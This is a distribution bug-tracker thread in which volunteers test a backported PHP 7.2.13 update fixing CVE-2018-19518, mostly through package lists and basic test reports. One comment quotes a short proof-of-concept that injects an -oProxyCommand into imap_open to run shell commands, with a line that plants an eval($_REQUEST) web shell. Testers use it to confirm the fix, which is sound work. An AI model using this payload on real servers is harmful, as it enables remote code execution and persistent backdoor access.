Backports update
Blocks: (none) => 23998
Suggested advisory: ======================== Updated php packages fix security vulnerabilities: Bypassing disabled exec functions in PHP via imap_open (CVE-2018-19518). References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19518 ======================== Updated packages in core/backports_testing: ======================== php-ini-7.2.13-2.mga6 apache-mod_php-7.2.13-2.mga6 php-cli-7.2.13-2.mga6 php-cgi-7.2.13-2.mga6 lib64php_common7-7.2.13-2.mga6 php-devel-7.2.13-2.mga6 php-openssl-7.2.13-2.mga6 php-zlib-7.2.13-2.mga6 php-doc-7.2.13-2.mga6.noarch php-bcmath-7.2.13-2.mga6 php-bz2-7.2.13-2.mga6 php-calendar-7.2.13-2.mga6 php-ctype-7.2.13-2.mga6 php-curl-7.2.13-2.mga6 php-dba-7.2.13-2.mga6 php-dom-7.2.13-2.mga6 php-enchant-7.2.13-2.mga6 php-exif-7.2.13-2.mga6 php-fileinfo-7.2.13-2.mga6 php-filter-7.2.13-2.mga6 php-ftp-7.2.13-2.mga6 php-gd-7.2.13-2.mga6 php-gettext-7.2.13-2.mga6 php-gmp-7.2.13-2.mga6 php-hash-7.2.13-2.mga6 php-iconv-7.2.13-2.mga6 php-imap-7.2.13-2.mga6 php-interbase-7.2.13-2.mga6 php-intl-7.2.13-2.mga6 php-json-7.2.13-2.mga6 php-ldap-7.2.13-2.mga6 php-mbstring-7.2.13-2.mga6 php-mysqli-7.2.13-2.mga6 php-mysqlnd-7.2.13-2.mga6 php-odbc-7.2.13-2.mga6 php-opcache-7.2.13-2.mga6 php-pcntl-7.2.13-2.mga6 php-pdo-7.2.13-2.mga6 php-pdo_dblib-7.2.13-2.mga6 php-pdo_firebird-7.2.13-2.mga6 php-pdo_mysql-7.2.13-2.mga6 php-pdo_odbc-7.2.13-2.mga6 php-pdo_pgsql-7.2.13-2.mga6 php-pdo_sqlite-7.2.13-2.mga6 php-pgsql-7.2.13-2.mga6 php-phar-7.2.13-2.mga6 php-posix-7.2.13-2.mga6 php-readline-7.2.13-2.mga6 php-recode-7.2.13-2.mga6 php-session-7.2.13-2.mga6 php-shmop-7.2.13-2.mga6 php-snmp-7.2.13-2.mga6 php-soap-7.2.13-2.mga6 php-sockets-7.2.13-2.mga6 php-sqlite3-7.2.13-2.mga6 php-sysvmsg-7.2.13-2.mga6 php-sysvsem-7.2.13-2.mga6 php-sysvshm-7.2.13-2.mga6 php-tidy-7.2.13-2.mga6 php-tokenizer-7.2.13-2.mga6 php-xml-7.2.13-2.mga6 php-xmlreader-7.2.13-2.mga6 php-xmlrpc-7.2.13-2.mga6 php-xmlwriter-7.2.13-2.mga6 php-xsl-7.2.13-2.mga6 php-wddx-7.2.13-2.mga6 php-zip-7.2.13-2.mga6 php-fpm-7.2.13-2.mga6 phpdbg-7.2.13-2.mga6 php-debuginfo-7.2.13-2.mga6 Source RPMs: php-7.2.13-2.mga6.src.rpm
Component: RPM Packages => SecurityQA Contact: (none) => securitySee Also: (none) => https://bugs.mageia.org/show_bug.cgi?id=23945Assignee: mageia => qa-bugs
This is a backport
QA Contact: security => (none)CC: (none) => tmbComponent: Security => Backports
There is a php-mcrypt in 5.6.39, none in 7.2.13 ?
CC: (none) => herman.viaene
in php 7 this is not boundled in main php. it is external (pecl) and is already in backports (version ~ 1.x)
Sorry, I don't get where you're pointing at. The 5.X package is still installed and so are packages libtomcrypt0, libmcrypt4 and libmcrypt, but the one we need is still missing in this installation because: $ php -S localhost:8000 [Fri Dec 14 11:43:17 2018] PHP Warning: PHP Startup: Unable to load dynamic library 'mcrypt.so' (tried: /usr/lib/php/extensions/mcrypt.so (/usr/lib/php/extensions/mcrypt.so: undefined symbol: _zend_list_delete), /usr/lib/php/extensions/mcrypt.so.so (/usr/lib/php/extensions/mcrypt.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [Fri Dec 14 11:43:19 2018] PHP Warning: PHP Startup: Unable to load dynamic library 'apcu.so' (tried: /usr/lib/php/extensions/apcu.so (/usr/lib/php/extensions/apcu.so: undefined symbol: zval_used_for_init), /usr/lib/php/extensions/apcu.so.so (/usr/lib/php/extensions/apcu.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 PHP 7.2.13 Development Server started at Fri Dec 14 11:43:20 2018 Listening on http://localhost:8000 Document root is /home/tester6/Documenten But this does not block the http://localhost:8000/create-png.php to work correctly.
both apcu and mcrypt are "extensions". mcrypt is backported: http://ftp.acc.umu.se/mirror/mageia/distrib/6/x86_64/media/core/backports/php-mcrypt-1.0.1-5.mga6.x86_64.rpm APC is an optional cache, which is kind of obsolete, so I didn't backport this extension yet. All extensions should be bound to the php-version (5.6.x, 7.2.x), but this was missed. But I'll correct this for the mga7 release.
Trying this for x86_64. Installed the php7.2 files from backports and ran a couple of tests. Created file containing "<?php phpinfo(); ?>" $ php phpinfo.php | less phpinfo() PHP Version => 7.2.11 [...] If you did not receive a copy of the PHP license, or have any questions about PHP licensing, please contact license@php.net. Started a server at localhost:8000 $ php -S localhost:8000 -t php PHP 7.2.11 Development Server started at Fri Dec 14 16:37:14 2018 Listening on http://localhost:8000 Document root is /home/lcl/dev/php Press Ctrl-C to quit. Referring to comment 5: the acpu and mcrypt extensions were not installed but the server started up OK. In a browser: http://localhost:8000/create-png.php That showed a blue square on a black background. localhost:8000/sample.php Showed: Now hear this. This is you captain speaking.All hands on deck. Abandon ship. That is as far as I can take it. What this package really needs is a test suite to properly exercize all or many of the functions. There is a PoC for CVE-2018-19518 at https://bugs.php.net/bug.php?id=76428 which consists of two short scripts but without any instructions for running them that a newbie could understand. Remote: <?php //File write: //<?=eval('eval('.strtoupper('$_REQUEST').'["x"]);');?> -E shell.php} // //RCE: //server=x -oProxyCommand="`curl$IFS''localhost?PWN`"}&login=1&password=1 imap_open('{'.$_POST['server'].':993/imap/ssl}INBOX', $_POST['login'], $_POST['password']); ?> Local: <?php file_put_contents('x','touch /tmp/PWN'); chmod('x', 0755); imap_open('{x -oProxyCommand="`bash$IFS\'\'x`"}', 0, 0); unlink('x'); ?> Skipped those and updated from backports testing. Restarted apache and ran the simple tests again. phpinfo() PHP Version => 7.2.13 The server logged: [Fri Dec 14 17:23:15 2018] 127.0.0.1:48006 [200]: /sample.php [Fri Dec 14 17:23:51 2018] 127.0.0.1:48016 [200]: /create-png.php On the basis of these basic tests and a clean install this is OK for 64-bits.
CC: (none) => tarazed25
Whiteboard: (none) => MGA6-64-OK
Installed and tested without issues. Tests included several large and small scripts, common (e.g. wordpress, drupal, roundcube) and custom scripts. No regressions noticed. System: Mageia 6, x86_64, Intel CPU. $ uname -a Linux marte 4.14.78-desktop-1.mga6 #1 SMP Sun Oct 21 20:31:12 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux $ rpm -qa | grep php.*-7.2 | sort apache-mod_php-7.2.13-2.mga6 lib64php_common7-7.2.13-2.mga6 php-bz2-7.2.13-2.mga6 php-cli-7.2.13-2.mga6 php-ctype-7.2.13-2.mga6 php-curl-7.2.13-2.mga6 php-dom-7.2.13-2.mga6 php-fileinfo-7.2.13-2.mga6 php-filter-7.2.13-2.mga6 php-ftp-7.2.13-2.mga6 php-gd-7.2.13-2.mga6 php-gettext-7.2.13-2.mga6 php-hash-7.2.13-2.mga6 php-iconv-7.2.13-2.mga6 php-ini-7.2.13-2.mga6 php-intl-7.2.13-2.mga6 php-json-7.2.13-2.mga6 php-ldap-7.2.13-2.mga6 php-mbstring-7.2.13-2.mga6 php-mysqli-7.2.13-2.mga6 php-mysqlnd-7.2.13-2.mga6 php-openssl-7.2.13-2.mga6 php-pdo-7.2.13-2.mga6 php-pdo_mysql-7.2.13-2.mga6 php-pdo_pgsql-7.2.13-2.mga6 php-pdo_sqlite-7.2.13-2.mga6 php-pgsql-7.2.13-2.mga6 php-phar-7.2.13-2.mga6 php-posix-7.2.13-2.mga6 php-session-7.2.13-2.mga6 php-sysvsem-7.2.13-2.mga6 php-sysvshm-7.2.13-2.mga6 php-tokenizer-7.2.13-2.mga6 php-xml-7.2.13-2.mga6 php-xmlreader-7.2.13-2.mga6 php-xmlwriter-7.2.13-2.mga6 php-zip-7.2.13-2.mga6 php-zlib-7.2.13-2.mga6
CC: (none) => mageia
@ PC_LX. Thanks for extending the tests. Yours are probably a lot more useful. Any idea about how the PoC could be run? The mailbox stuff is way above my head.
Tested the PoC in comment #7 and no external command was executed (e.g. touch /tmp/PWN) so I think it is fixed. Had to install php-imap to make the test. $ rpm -q php-imap php-imap-7.2.13-2.mga6
@PC_LX. Don't know how you did it but thanks for running it and the hint about php-imap.
Thanks to all of you. Validating. No advisory for backports.
CC: (none) => lewyssmithKeywords: (none) => validated_backport
is there any more action missing?!
packages moved
Resolution: (none) => FIXEDStatus: NEW => RESOLVED